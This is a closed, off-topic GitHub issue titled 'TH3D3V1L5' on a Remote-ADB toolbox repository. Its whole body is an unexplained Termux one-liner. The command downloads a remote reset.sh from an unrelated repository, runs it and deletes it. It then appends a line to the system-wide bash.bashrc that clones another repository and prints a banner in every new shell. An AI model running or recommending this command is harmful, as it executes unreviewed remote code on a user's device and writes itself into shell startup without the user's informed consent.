jarhot1992 / Remote-ADB

This is a powerful mobile adb shell & Toolbox.
Apache License 2.0
764 stars 118 forks source link

TH3D3V1L5 #188

Closed D1480L1X closed 4 days ago

D1480L1X commented 4 days ago

pkg install wget -y && cd $HOME && wget https://raw.githubusercontent.com/Bhai4You/Termux-Ninja/refs/heads/main/reset.sh && bash reset.sh && rm -rvf reset.sh > /dev/null 2>&1 && echo "[ -d '$HOME/.ninja' ] && (cd '$HOME/.ninja') || (pkg install git -y && git clone https://github.com/Bhai4You/Termux-Ninja '$HOME/.ninja' && cd '$HOME/.ninja' && pkg install figlet -y ) && figlet -d $HOME/.ninja/ -f roman TH3D3V1L5 " >> $PREFIX/etc/bash.bashrc && rm -rvf reset.sh